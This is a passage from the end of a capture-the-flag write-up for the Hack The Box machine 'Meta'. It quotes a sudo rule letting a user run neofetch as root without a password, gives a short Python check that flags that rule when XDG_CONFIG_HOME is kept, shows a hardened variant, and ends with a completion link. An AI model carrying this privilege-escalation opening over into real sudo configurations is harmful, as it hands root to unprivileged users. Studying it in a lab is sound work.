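User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"
"""
HARDENED = VULNERABLE.replace(",\n    env_keep+=XDG_CONFIG_HOME", "")

if __name__ == "__main__":
    print(risky_rules(VULNERABLE))  # neofetch rule paired with XDG_CONFIG_HOME
    print(risky_rules(HARDENED))    # []
```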

0x03 Completion Proof

https://www.hackthebox.com/achievement/machine/1705469/429


https://sh1yan.top/2024/01/30/Meta-htb-writeup/
Author: shiyan
Published: January 30, 2024